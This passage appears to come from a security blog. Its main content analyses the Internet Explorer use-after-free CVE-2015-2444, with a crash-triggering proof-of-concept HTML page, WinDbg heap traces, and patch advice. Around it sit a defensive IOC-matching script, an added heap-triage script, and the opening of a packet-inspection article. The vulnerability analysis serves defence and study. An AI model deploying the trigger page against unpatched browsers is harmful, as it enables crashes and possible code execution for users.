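    """Normalise a record value or Content text according to the Content type."""
    if content_type == "int":
        return int(value)
    if content_type == "date":
        return datetime.fromisoformat(str(value).replace("Z", "+00:00")).astimezone(timezone.utc)
    return str(value).lower()  # hashes and NTFS file names compare case-insensitively


def _item_matches(item, record):
    context, content = item.find("Context"), item.find("Content")
    key = context.get("search")
    if key not in record:
        return False  # the agent did not report this attribute: no match
    ctype = content.get("type")
    actual, expected = _coerce(record[key], ctype), _coerce(content.text, ctype)
    condition = item.get("condition")
    if condition == "is":
        return actual == expected
    if condition == "contains" and isinstance(actual, str):
        return expected in actual
    raise ValueError(f"unsupported condition {condition!r} for type {ctype!r}")


def evaluate(indicator, record):
    """Recursively apply the Indicator's AND/OR operator to its children."""
    results = []
    for child in indicator:
        if child.tag == "IndicatorItem":
            results.append(_item_matches(child, record))
        elif child.tag == "Indicator":
            results.append(evaluate(child, record))
    if not results:
        return False
    combine = all if indicator.get("operator", "OR").upper() == "AND" else any
    return combine(results)


def match_files(ioc_xml, records):
    """Return the names of the records that satisfy the IOC."""
    root = ET.fromstring(ioc_xml)
    return [r["FileItem/FileName"] for r in records if evaluate(root, r)]


if __name__ == "__main__":
    print(match_files(PONY_IOC, SAMPLE_FILES))
```

The nested AND is what gives the indicator some resilience: a byte-level change that defeats the hash items still leaves name, size and compile timestamp to match on, which is why those three are combined rather than listed as independent OR terms.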
Using VirusTotal (VT) we can map other files that use the same location to download further malware.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/111915_0009_Reversingth5.png" /></div>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/111915_0009_Reversingth4.png" /></div>
</div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-619916641139647632015-12-31T14:31:00.000+05:302015-12-31T14:31:19.660+05:30Internet Explorer remote memory-corruption vulnerability CVE-2015-2444<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<strong><a href="https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcQ5cHYM7YscvdoYZPULmd5HpBvLGCcjo_SYzcPLysc4gGoq4ShwZA" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcQ5cHYM7YscvdoYZPULmd5HpBvLGCcjo_SYzcPLysc4gGoq4ShwZA" /></a></strong></div>
<div style="margin-left: 36pt;">
<strong>Vulnerability</strong>: As per the <a href="https://www.symantec.com/security_response/vulnerability.jsp?bid=76194">Symantec</a> report,
Microsoft Internet Explorer is prone to a remote memory-corruption
vulnerability. Attackers can exploit this issue by enticing an
unsuspecting user to view a specially-crafted webpage. Attackers can
exploit this issue to execute arbitrary code in the context of the
currently logged-in user. Failed attacks will cause denial-of-service
conditions. Internet Explorer 8, 9, 10 and 11 are vulnerable.</div>
<div style="margin-left: 36pt;">
The following are details of the vulnerability report</div>
<div style="margin-left: 36pt;">
<strong>Vendor</strong>: Microsoft, http://www.microsoft.com</div>
<div style="margin-left: 36pt;">
<strong>Affected Products</strong>: Internet Explorer</div>
<div style="margin-left: 36pt;">
<strong>Affected Version</strong>: IE 8-11</div>
<div style="margin-left: 36pt;">
<strong>Vulnerability</strong>: CTreeNode::GetCascadedLang Use-After-Free</div>
<div style="margin-left: 36pt;">
<strong>CVE ID</strong>: CVE-2015-2444</div>
<div style="margin-left: 36pt;">
<strong>Details</strong>:</div>
<div style="margin-left: 36pt;">
Microsoft Internet Explorer is prone to a
Use-After-Free vulnerability in the MSHTML!CTreeNode::GetCascadedLang
function. We will do a detailed analysis with WinDbg and IDA Pro.</div>
<div style="margin-left: 36pt;">
Proof of Concept:</div>
<div style="margin-left: 36pt;">
The following HTML page causes the crash:</div>
<div style="margin-left: 36pt;">
<!DOCTYPE HTML></div>
<div style="margin-left: 36pt;">
<html></div>
<div style="margin-left: 36pt;">
<meta http-equiv="X-UA-Compatible" content="IE=10" /></div>
<div style="margin-left: 36pt;">
<script></div>
<div style="margin-left: 36pt;">
function Trigger()</div>
<div style="margin-left: 36pt;">
{</div>
<div style="margin-left: 36pt;">
for(i=0; i < document.getElementsByTagName("meter").length; i++)</div>
<div style="margin-left: 36pt;">
{</div>
<div style="margin-left: 36pt;">
document.getElementsByTagName("meter")[i].innerText = "a";</div>
<div style="margin-left: 36pt;">
}</div>
<div style="margin-left: 36pt;">
}</div>
<div style="margin-left: 36pt;">
function reload()</div>
<div style="margin-left: 36pt;">
{</div>
<div style="margin-left: 36pt;">
location.reload();</div>
<div style="margin-left: 36pt;">
}</div>
<div style="margin-left: 36pt;">
setTimeout("reload()", 1000);</div>
<div style="margin-left: 36pt;">
</script></div>
<div style="margin-left: 36pt;">
<button><label><style>label{}</style><form></div>
<div style="margin-left: 36pt;">
<meter>label<optgroup><meter>fieldset<script>Trigger();</script></meter></div>
<div style="margin-left: 36pt;">
<select></select><button></button><form><form></div>
<div style="margin-left: 36pt;">
<input><script>Trigger();</script></div>
<div style="margin-left: 36pt;">
<form><style>form{-ms-behavior: url("c");}</style></form></div>
<div style="margin-left: 36pt;">
</html></div>
<div style="margin-left: 36pt;">
<strong>Source Code Analysis:<br />
</strong></div>
<div style="margin-left: 36pt;">
document.getElementsByTagName("meter").length:
First, the script collects the elements with the given tag name, here
<em>meter</em>, and uses the length of that collection as the bound of the for loop.</div>
<div style="margin-left: 36pt;">
document.getElementsByTagName("meter")[i].innerText = "a": It then sets the innerText property of the <em>meter</em> element at index i to <em>a</em>.</div>
<div style="margin-left: 36pt;">
reload(): setTimeout schedules this function to run after 1000 ms, at which point it reloads the page.</div>
<div style="margin-left: 36pt;">
<label><style>label{}</style><form>: Then it creates a label, a style element containing an empty label{} rule, and an opening form tag.</div>
<div style="margin-left: 36pt;">
<meter>label<optgroup><meter>fieldset<script>Trigger();</script></meter>:
This nests the meter elements and calls the Trigger function from an inline
script while the parser is still building the tree; this is where the relevant memory allocation happens.</div>
<div style="margin-left: 36pt;">
form{-ms-behavior: url("c");}: This applies a behavior whose URL is c, but
no such URL is defined. This is what causes the crash; the WinDbg analysis
below gives the details.</div>
<div style="margin-left: 36pt;">
<strong>Analysis Using Windbg:<br />
</strong></div>
<div style="margin-left: 36pt;">
Before starting with WinDbg, we have to set up its symbol path. Please follow the links below:</div>
<div style="margin-left: 36pt;">
<a href="https://www.osr.com/blog/2014/10/01/setting-the-windbg-symbol-search-path/">https://www.osr.com/blog/2014/10/01/setting-the-windbg-symbol-search-path/</a></div>
<div style="margin-left: 36pt;">
<a href="http://blogs.msdn.com/b/cclayton/archive/2010/02/24/how-to-setup-windbg.aspx">http://blogs.msdn.com/b/cclayton/archive/2010/02/24/how-to-setup-windbg.aspx</a></div>
<div style="margin-left: 36pt; text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122915_0332_CVE201524441.png" /><span style="font-size: 12pt;"><br />
</span></div>
<div style="margin-left: 36pt;">
With page heap enabled, visiting the page crashes the browser and we see the following:</div>
<div style="margin-left: 36pt;">
<span style="font-family: Courier New;">(7c0.408): Access violation - code c0000005 (first chance)<br />
</span>First chance exceptions are reported before any exception handling. This exception may be expected and handled.<br />
<span style="font-family: Courier New;">*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\SYSTEM32\MSHTML.dll -<br />
eax=00000000 ebx=12698fa0 ecx=0000ffff edx=00000100 esi=00000000 edi=12696fb8<br />
eip=6fea5a44 esp=0a75ba18 ebp=0a75ba38 iopl=0 nv up ei pl zr na pe nc<br />
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246<br />
MSHTML!CreateCoreWebView+0x1e0234:<br />
6fea5a44 81b828030000506ffb6f cmp dword ptr [eax+328h],offset MSHTML!CreateCoreWebView+0x2f1740 (6ffb6f50)<br />
ds:002b:00000328=????????</span></div>
0:011> ub<br />
MSHTML!CTreeNode::GetCascadedLang+0x5f:<br />
6fea5a2b 8945f8 mov dword ptr [ebp-8],eax<br />
6fea5a2e 8945f0 mov dword ptr [ebp-10h],eax<br />
6fea5a31 8b4710 mov eax,dword ptr [edi+10h]<br />
6fea5a34 85c0 test eax,eax<br />
6fea5a36 740a je MSHTML!CTreeNode::GetCascadedLang+0x76 (6fea5a42)<br />
6fea5a38 f6400c04 test byte ptr [eax+0Ch],4<br />
6fea5a3c 0f859a020000 jne MSHTML!CTreeNode::GetCascadedLang+0x30f (6fea5cdc)<br />
6fea5a42 8b07 mov eax,dword ptr [edi]<br />
0:011> !heap -p -a edi+10<br />
address 12696fc8 found in<br />
_DPH_HEAP_ROOT @ a961000<br />
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)<br />
a9646e8: 12696fb8 48 - 12696000 2000<br />
71e694ec verifier!AVrfDebugPageHeapAllocate+0x0000023c<br />
779057b7 ntdll!RtlDebugAllocateHeap+0x0000003c<br />
778a77ce ntdll!RtlpAllocateHeap+0x0004665a<br />
77861134 ntdll!RtlAllocateHeap+0x0000014d<br />
6fa31dd5 MSHTML!CLabelElement::CreateElement+0x00000015<br />
6f8a5b4d MSHTML!CreateElement+0x00000084<br />
6fa14768 MSHTML!CInBodyInsertionMode::DefaultStartElementHandler+0x00000078<br />
6f91d6eb MSHTML!CInsertionMode::HandleStartElementToken+0x0000003d<br />
6f91d3a3 MSHTML!CHtml5TreeConstructor::HandleElementTokenInInsertionMode+0x00000026<br />
6f91d338 MSHTML!CHtml5TreeConstructor::PushElementToken+0x000000a5<br />
6f91d1cc MSHTML!CHtml5Tokenizer::TagName_StateHandler+0x0000028c<br />
6f91ab35 MSHTML!CHtml5Tokenizer::ParseBuffer+0x0000012c<br />
6f91ae09 MSHTML!CHtml5Parse::ParseToken+0x00000131<br />
6f91a377 MSHTML!CHtmPost::ProcessTokens+0x000006af<br />
6f914952 MSHTML!CHtmPost::Exec+0x000001e4<br />
6f991118 MSHTML!CHtmPost::Run+0x0000003d<br />
6f99107e MSHTML!PostManExecute+0x00000061<br />
6f9994a2 MSHTML!PostManResume+0x0000007b<br />
6f9b04f7 MSHTML!CDwnChan::OnMethodCall+0x0000003e<br />
6f7fd865 MSHTML!GlobalWndOnMethodCall+0x0000016d<br />
6f7fd18a MSHTML!GlobalWndProc+0x000002e5<br />
75a68e71 user32!_InternalCallWinProc+0x0000002b<br />
75a690d1 user32!UserCallWinProcCheckWow+0x0000018e<br />
75a6a66f user32!DispatchMessageWorker+0x00000208<br />
75a6a6e0 user32!DispatchMessageW+0x00000010<br />
710600d8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000464<br />
7108d0d8 IEFRAME!LCIETab_ThreadProc+0x0000037b<br />
71c7d81c iertutil!_IsoThreadProc_WrapperToReleaseScope+0x0000001c<br />
70ef3991 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x00000094<br />
755f7c04 KERNEL32!BaseThreadInitThunk+0x00000024<br />
7787ad1f ntdll!__RtlUserThreadStart+0x0000002f<br />
7787acea ntdll!_RtlUserThreadStart+0x0000001b<br />
0:011> db edi+10<br />
12696fc8 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................<br />
12696fd8 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................<br />
12696fe8 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................<br />
12696ff8 00 00 00 00 00 00 00 00-?? ?? ?? ?? ?? ?? ?? ?? ........????????<br />
12697008 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????<br />
12697018 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????<br />
12697028 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????<br />
12697038 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????<br />
This looks like a use-after-free on memory that was previously freed by
the ProtectedFree implementation (and zeroed out) but that the heap
manager has not yet marked as free. To verify this assumption, we first
disable the Memory Protector feature and check whether the code is really
accessing freed memory:<br />
<span style="font-family: Courier New;">C:\>reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MEMPROTECT_MODE"<br />
</span><br />
<span style="font-family: Courier New;">HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main\Feature<br />
Control\FEATURE_MEMPROTECT_MODE<br />
iexplore.exe REG_DWORD 0x0<br />
</span><br />
<span style="color: black;">If we trigger the crash again, we notice
that this time freed memory is accessed and that the memory was indeed
previously released by the ProtectedFree function.</span><br />
<span style="font-family: Courier New;">(12c.4a4): Access violation - code c0000005 (first chance)<br />
</span>First chance exceptions are reported before any exception handling.<br />
This exception may be expected and handled.<br />
<span style="font-family: Courier New;">eax=00000000 ebx=0e958fa0 ecx=0000ffff edx=00000100 esi=00000000 edi=0e982fb8<br />
eip=70595a31 esp=0b3cbda0 ebp=0b3cbdc0 iopl=0 nv up ei pl zr na pe nc<br />
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246<br />
MSHTML!CTreeNode::GetCascadedLang+0x65:<br />
70595a31 8b4710 mov eax,dword ptr [edi+10h] ds:002b:0e982fc8=????????<br />
</span><br />
<span style="font-family: Courier New;">0:006> !heap -p -a edi+10<br />
address 0e982fc8 found in<br />
_DPH_HEAP_ROOT @ aa31000<br />
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)<br />
aa34f70: e982000 2000<br />
72909712 verifier!AVrfDebugPageHeapFree+0x000000c2<br />
77906061 ntdll!RtlDebugFreeHeap+0x0000003c<br />
778a69ea ntdll!RtlpFreeHeap+0x00044b2f<br />
77861eaa ntdll!RtlFreeHeap+0x000001b6<br />
<strong> 6feacbbd MSHTML!MemoryProtection::CMemoryProtector::ProtectedFree+0x00000122</strong><br />
701a8a95 MSHTML!CLabelElement::`vector deleting destructor'+0x00000025<br />
6fef7001 MSHTML!CBase::SubRelease+0x00000045<br />
6ff14ee2 MSHTML!CElement::PrivateExitTree+0x00000060<br />
6ff15c8a MSHTML!CMarkup::DestroySplayTree+0x000003ab<br />
6ff16b26 MSHTML!CMarkup::UnloadContents+0x00000d33<br />
70198f3c MSHTML!CMarkup::TearDownMarkupHelper+0x000000a7<br />
70198e63 MSHTML!CMarkup::TearDownMarkup+0x00000058<br />
7018af24 MSHTML!COmWindowProxy::SwitchMarkup+0x000004f3<br />
70876d6a MSHTML!COmWindowProxy::ExecRefresh+0x00000a1d<br />
70876ee3 MSHTML!COmWindowProxy::ExecRefreshCallback+0x00000023<br />
6feed865 MSHTML!GlobalWndOnMethodCall+0x0000016d<br />
6feed18a MSHTML!GlobalWndProc+0x000002e5<br />
75a68e71 user32!_InternalCallWinProc+0x0000002b<br />
75a690d1 user32!UserCallWinProcCheckWow+0x0000018e<br />
75a6a66f user32!DispatchMessageWorker+0x00000208<br />
75a6a6e0 user32!DispatchMessageW+0x00000010<br />
71a700d8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000464<br />
71a9d0d8 IEFRAME!LCIETab_ThreadProc+0x0000037b<br />
7271d81c iertutil!_IsoThreadProc_WrapperToReleaseScope+0x0000001c<br />
716f3991 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x00000094<br />
755f7c04 KERNEL32!BaseThreadInitThunk+0x00000024<br />
7787ad1f ntdll!__RtlUserThreadStart+0x0000002f<br />
7787acea ntdll!_RtlUserThreadStart+0x0000001b</span><br />
0:006> kb<br />
ChildEBP RetAddr Args to Child<br />
0b3cbdc0 7059559d 1330afc8 0b3cc1ec 00000001 MSHTML!CTreeNode::GetCascadedLang+0x65<br />
0b3cbe78 700173bf 0ab19fa0 0e615fa0 00000003 MSHTML!CStyleSheetArray::BuildListOfProbableRules+0x2d5<br />
0b3cbf3c 6fff6d3c 0b3cc1ec 00000001 00000003 MSHTML!CStyleSheetArray::BuildListOfMatchedRules+0x57<br />
0b3cc190 70284613 0b3cc1ec 00000003 00000400 MSHTML!CMarkup::ApplyStyleSheets+0xca<br />
0b3cc1c4 701a742e 0b3cc1ec 00000000 0aa41bb8 MSHTML!CElement::ApplyBehaviorCss+0x9e<br />
0b3cc46c 700adfe3 00000004 07450000 0aa41bb8 MSHTML!CElement::ProcessPeerTask+0xc1f<br />
0b3cc488 700adf3c 00000000 1375dfe8 0aa41bb8 MSHTML!CMarkup::ProcessPeerTaskContext+0x8e<br />
0b3cc4a0 700d3070 0aa41bb8 00000000 00000000 MSHTML!CMarkup::ProcessPeerTasks+0x3f<br />
0b3cc550 6ff17539 00000001 00000000 0b3cc57c MSHTML!CMarkup::UnloadContents+0x1017<br />
0b3cc574 6fef705c 0f4febb8 00000001 6feeccb0 MSHTML!CMarkup::Passivate+0x89<br />
0b3cc58c 6feecccc 0f4febb8 0f4febb8 00000001 MSHTML!CBase::PrivateRelease+0xbc<br />
0b3cc5a8 6ff040f6 0f4febb8 0b3cc5d0 6feecf70 MSHTML!CMarkup::Release+0x18<br />
0b3cc5c4 703edeb0 0f318f18 0e97cf90 00000000 MSHTML!CTxtSite::Release+0xc2<br />
0b3cc5d8 703ede77 00000000 0e97cf90 00000000 MSHTML!CImplPtrAry::ReleaseAndDelete+0x2e<br />
0b3cc5ec 70481a67 00000000 0b3cc624 0e97cf90 MSHTML!CFormElement::DetachExtraFormInputSiteByIndex+0x22<br />
0b3cc5fc 701b66e3 0e97cf90 0b3cc618 0b3cc680 MSHTML!CFormElement::DetachAllExtraFormInputSites+0x13<br />
0b3cc60c 6ff15be3 0b3cc624 0b3cc690 7019abb0 MSHTML!CFormElement::Notify+0x76<br />
0b3cc680 6ff16b26 00000001 00000001 0f2ace30 MSHTML!CMarkup::DestroySplayTree+0x2dd<br />
0b3cc730 70198f3c 00000000 00000001 0c9d4bd0 MSHTML!CMarkup::UnloadContents+0xd33<br />
0b3cc748 70198e63 00000001 00000001 0f33cbb8 MSHTML!CMarkup::TearDownMarkupHelper+0xa7<br />
0b3cc770 7018af24 00000001 00000001 0b3cc838 MSHTML!CMarkup::TearDownMarkup+0x58<br />
0b3cc818 70876d6a 0f33cbb8 00000000 00000000 MSHTML!COmWindowProxy::SwitchMarkup+0x4f3<br />
0b3cc8fc 70876ee3 00005004 ffffffff 00000000 MSHTML!COmWindowProxy::ExecRefresh+0xa1d<br />
0b3cc910 6feed865 0aeb9f68 00005004 0ba04cc8 MSHTML!COmWindowProxy::ExecRefreshCallback+0x23<br />
0b3cc95c 6feed18a 3e26b724 6feec290 00008002 MSHTML!GlobalWndOnMethodCall+0x16d<br />
0b3cc9ac 75a68e71 000103d0 00008002 00000000 MSHTML!GlobalWndProc+0x2e5<br />
0b3cc9d8 75a690d1 6feec290 000103d0 00008002 user32!_InternalCallWinProc+0x2b<br />
0b3cca6c 75a6a66f 6feec290 00000000 00008002 user32!UserCallWinProcCheckWow+0x18e<br />
0b3ccad8 75a6a6e0 30748176 0b3cfcb0 71a700d8 user32!DispatchMessageWorker+0x208<br />
0b3ccae4 71a700d8 0b3ccb24 11ce0e48 1161cfe0 user32!DispatchMessageW+0x10<br />
0b3cfcb0 71a9d0d8 0b3cfd7c 71a9cd50 11cdeff0 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464<br />
0b3cfd70 7271d81c 11ce0e48 0b3cfd94 71b05f70 IEFRAME!LCIETab_ThreadProc+0x37b<br />
0b3cfd88 716f3991 11cdeff0 716f3900 716f3900 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1c<br />
0b3cfdc0 755f7c04 0e502fe8 755f7be0 3b839130 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94<br />
0b3cfdd4 7787ad1f 0e502fe8 3972bde9 00000000 KERNEL32!BaseThreadInitThunk+0x24<br />
0b3cfe1c 7787acea ffffffff 7786022b 00000000 ntdll!__RtlUserThreadStart+0x2f<br />
0b3cfe2c 00000000 716f3900 0e502fe8 00000000 ntdll!_RtlUserThreadStart+0x1b<br />
If we check the accessed memory location just before the JavaScript
method location.reload() is called, we can see where the memory for the
CLabelElement object was allocated.<br />
<span style="color: black;"><br />
<span style="font-family: Courier New;">0:020> !heap -p -a 0e982fc8<br />
address 0e982fc8 found in<br />
_DPH_HEAP_ROOT @ aa31000<br />
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)<br />
aa34f70: e982fb8 48 - e982000 2000<br />
MSHTML!CLabelElement::`vftable'<br />
729094ec verifier!AVrfDebugPageHeapAllocate+0x0000023c<br />
779057b7 ntdll!RtlDebugAllocateHeap+0x0000003c<br />
778a77ce ntdll!RtlpAllocateHeap+0x0004665a<br />
77861134 ntdll!RtlAllocateHeap+0x0000014d<br />
70121dd5 MSHTML!CLabelElement::CreateElement+0x00000015<br />
6ff95b4d MSHTML!CreateElement+0x00000084<br />
70104768 MSHTML!CInBodyInsertionMode::DefaultStartElementHandler+0x00000078<br />
7000d6eb MSHTML!CInsertionMode::HandleStartElementToken+0x0000003d<br />
7000d3a3 MSHTML!CHtml5TreeConstructor::HandleElementTokenInInsertionMode+0x00000026<br />
7000d338 MSHTML!CHtml5TreeConstructor::PushElementToken+0x000000a5<br />
7000d1cc MSHTML!CHtml5Tokenizer::TagName_StateHandler+0x0000028c<br />
7000ab35 MSHTML!CHtml5Tokenizer::ParseBuffer+0x0000012c<br />
7000ae09 MSHTML!CHtml5Parse::ParseToken+0x00000131<br />
7000a377 MSHTML!CHtmPost::ProcessTokens+0x000006af<br />
70004952 MSHTML!CHtmPost::Exec+0x000001e4<br />
70081118 MSHTML!CHtmPost::Run+0x0000003d<br />
7008107e MSHTML!PostManExecute+0x00000061<br />
700894a2 MSHTML!PostManResume+0x0000007b<br />
700a04f7 MSHTML!CDwnChan::OnMethodCall+0x0000003e<br />
6feed865 MSHTML!GlobalWndOnMethodCall+0x0000016d<br />
6feed18a MSHTML!GlobalWndProc+0x000002e5<br />
75a68e71 user32!_InternalCallWinProc+0x0000002b<br />
75a690d1 user32!UserCallWinProcCheckWow+0x0000018e<br />
75a6a66f user32!DispatchMessageWorker+0x00000208<br />
75a6a6e0 user32!DispatchMessageW+0x00000010<br />
71a700d8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000464<br />
71a9d0d8 IEFRAME!LCIETab_ThreadProc+0x0000037b<br />
7271d81c iertutil!_IsoThreadProc_WrapperToReleaseScope+0x0000001c<br />
716f3991 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x00000094<br />
755f7c04 KERNEL32!BaseThreadInitThunk+0x00000024<br />
7787ad1f ntdll!__RtlUserThreadStart+0x0000002f<br />
7787acea ntdll!_RtlUserThreadStart+0x0000001b</span></span><br />
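The triage done by eye above (is the block busy or already freed, which code allocated or released it, and which object lived there) can be scripted for the next crash. The following is an added example, not code from the original post: it parses "!heap -p -a" listings in the format WinDbg printed above, skipping the verifier and ntdll allocator frames to reach the first MSHTML frame and reading the C++ class from it. The two listings embedded as input are copied from the session above using plain ASCII hyphens, and ALLOCATOR_MODULES is an assumption about which frames to skip.

```python
import re

# Two listings from the WinDbg session above, used as constructed input.
LIVE_BLOCK = """\
address 12696fc8 found in
    _DPH_HEAP_ROOT @ a961000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                 a9646e8:         12696fb8               48 -         12696000             2000
    71e694ec verifier!AVrfDebugPageHeapAllocate+0x0000023c
    779057b7 ntdll!RtlDebugAllocateHeap+0x0000003c
    778a77ce ntdll!RtlpAllocateHeap+0x0004665a
    77861134 ntdll!RtlAllocateHeap+0x0000014d
    6fa31dd5 MSHTML!CLabelElement::CreateElement+0x00000015
    6f8a5b4d MSHTML!CreateElement+0x00000084
"""

FREED_BLOCK = """\
address 0e982fc8 found in
    _DPH_HEAP_ROOT @ aa31000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    aa34f70:          e982000             2000
    72909712 verifier!AVrfDebugPageHeapFree+0x000000c2
    77906061 ntdll!RtlDebugFreeHeap+0x0000003c
    778a69ea ntdll!RtlpFreeHeap+0x00044b2f
    77861eaa ntdll!RtlFreeHeap+0x000001b6
    6feacbbd MSHTML!MemoryProtection::CMemoryProtector::ProtectedFree+0x00000122
    701a8a95 MSHTML!CLabelElement::`vector deleting destructor'+0x00000025
    6fef7001 MSHTML!CBase::SubRelease+0x00000045
"""

ADDR_RE = re.compile(r"address ([0-9a-fA-F]+) found in")
STATE_RE = re.compile(r"in (busy|free-ed) allocation")
# Busy blocks carry "UserAddr UserSize - VirtAddr VirtSize" on the line after the header.
BLOCK_RE = re.compile(r"^\s*[0-9a-fA-F]+:\s+(?P<user>[0-9a-fA-F]+)\s+(?P<size>[0-9a-fA-F]+)\s+-", re.M)
# Stack frames: 8 hex digits, then module!symbol (symbols may contain spaces).
FRAME_RE = re.compile(r"^[ \t]*[0-9a-fA-F]{8}[ \t]+(?P<module>[^!\s]+)!(?P<symbol>.+?)[ \t]*$", re.M)
CLASS_RE = re.compile(r"^(C\w+)::")          # MSHTML classes are C-prefixed
ALLOCATOR_MODULES = {"verifier", "ntdll"}    # assumed: frames that only wrap the heap call


def triage(listing):
    """Summarise one '!heap -p -a' listing as a dict an analyst can act on."""
    addr, state = ADDR_RE.search(listing), STATE_RE.search(listing)
    if not (addr and state):
        raise ValueError("not a '!heap -p -a' listing")
    frames = [(m["module"], m["symbol"]) for m in FRAME_RE.finditer(listing)]
    app_frames = [f for f in frames if f[0] not in ALLOCATOR_MODULES]
    origin = "!".join(app_frames[0]) if app_frames else None
    object_class = next((CLASS_RE.match(sym).group(1) for _, sym in app_frames
                         if CLASS_RE.match(sym)), None)
    result = {
        "address": int(addr.group(1), 16),
        "state": "freed" if state.group(1) == "free-ed" else "busy",
        "origin": origin,            # first non-allocator frame: who allocated or freed
        "object_class": object_class,
        "user_size": None,
    }
    if result["state"] == "freed":
        result["verdict"] = "use-after-free: the faulting access targets a block that was already released"
    else:
        block = BLOCK_RE.search(listing)
        if block:
            result["user_size"] = int(block["size"], 16)
        result["verdict"] = ("block still live; if its contents are all zero and Memory Protector is "
                             "enabled, treat it as a deferred free and re-test with "
                             "FEATURE_MEMPROTECT_MODE set to 0")
    return result


if __name__ == "__main__":
    for listing in (LIVE_BLOCK, FREED_BLOCK):
        print(triage(listing))
```

With Memory Protector on, the first listing reports a busy block, which is exactly the ambiguous case the text works through; the script therefore only gives a firm use-after-free verdict for the freed state and otherwise tells the analyst which setting to flip before re-running.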
<br />
<div style="margin-left: 36pt;">
<strong>Impact:<br />
</strong></div>
<div style="margin-left: 36pt;">
If an attacker succeeds in bypassing the
Memory Protector and Isolated Heap protection mechanisms, this
vulnerability allows the execution of arbitrary code on vulnerable
installations of Microsoft Internet Explorer. User interaction is
required to exploit this vulnerability in that the targeted victim must
visit a malicious page or open a malicious file.</div>
<b> Conclusion:</b><br />
<div style="margin-left: 36pt;">
<span style="font-weight: 400;">The above vulnerability is already
being exploited in the wild: it is used to deliver malware through
advertisements in the victim's browser if the victim uses a vulnerable
version of IE. So update your IE with the latest patch, and be sure to
update your antivirus as well to defend against this vulnerability.</span></div>
<div style="margin-left: 36pt;">
<strong>Mitigation:<br />
</strong></div>
<div style="margin-left: 36pt;">
Microsoft has already released a patch for it. Please use the patch or update your system:</div>
<a href="https://technet.microsoft.com/en-us/library/security/ms15-079.aspx"><span style="font-family: Times New Roman; font-size: 12pt;"><strong>https://technet.microsoft.com/en-us/library/security/ms15-079.aspx</strong></span></a></div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-20100633364668171592015-12-31T14:21:00.000+05:302015-12-31T14:21:23.266+05:30Deep Packet Inspection in Cloud Applications<div dir="ltr" style="text-align: left;" trbidi="on">
<h1>
Cloud-Based Applications and Protocols</h1>
In the <a href="http://opentechnation.blogspot.in/2015/12/security-vulnerabilities-in-cloud.html" target="_blank">previous</a>
article, we established that security in cloud-based applications is
important and that searching for vulnerabilities in cloud applications is
neither harder than nor fundamentally different from doing so in web-based
applications. In this article we'll take a somewhat different approach:
we'll look at the protocols cloud-based applications use under the hood
and apply deep packet inspection techniques to look for malicious
traffic.<br />
Every cloud-based application is running on top of a protocol that
allows the clients to communicate with the server in a standardized way;
otherwise, the client applications wouldn’t be able to communicate with
the server at all. If we have a room full of people and everybody
speaks a different language, they won’t be able to communicate. In order
to reach a common goal, they would have to agree on a way to interact
among themselves, thus forming a standard for communication that
everybody would understand.<br />
There are many protocols that we use in our daily lives when
communicating with cloud-based applications, perhaps without even
realizing it. The most commonly used protocols are the following:<br />
<ul>
<li>HTTP</li>
<li>HTTPS</li>
<li>DNS</li>
<li>SMTP</li>
<li>Custom Protocols</li>
</ul>
In order to observe the traffic coming to and going out of the cloud applications, we’re going to use <a href="https://www.docker.com/">Docker</a>
for building, shipping and running dockerized applications. Docker is
gaining in popularity and continues to be the most used container
platform, which is also being used by cloud-service providers to deploy
applications to the cloud; one such example is AWS, which is able to
directly run Docker applications.<br />
In order to analyze traffic coming to and going from Docker applications, we have to look at <a href="https://www.elastic.co/products/beats/packetbeat">Packetbeat</a>, which ships the traffic to Elasticsearch, which further enables the analysis and visualization of real-time traffic in Kibana.<br />
<h1>
Introduction to Packetbeat</h1>
We’ll assume that we already have Docker installed and ready to use,
since it’s fairly easy to do so. You can check whether Docker is
installed by issuing the following command:<br />
